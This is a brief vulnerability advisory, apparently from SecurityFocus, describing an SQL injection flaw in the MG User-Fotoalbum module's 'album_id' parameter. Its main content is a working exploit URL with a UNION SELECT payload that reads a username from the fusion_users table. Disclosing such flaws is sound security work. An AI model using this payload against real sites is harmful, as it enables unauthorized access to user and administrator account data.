MG User-Fotoalbum 'album_id' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/infusions/mg_user_fotoalbum_panel/mg_user_fot
oalbum.php?album_user_id=251&album_id=%27+union+select+1,2,3,4,user_name,6,7,8,9,10,11
+from+fusion_users+where+user_id=1--+


 

Privacy Statement
Copyright 2010, SecurityFocus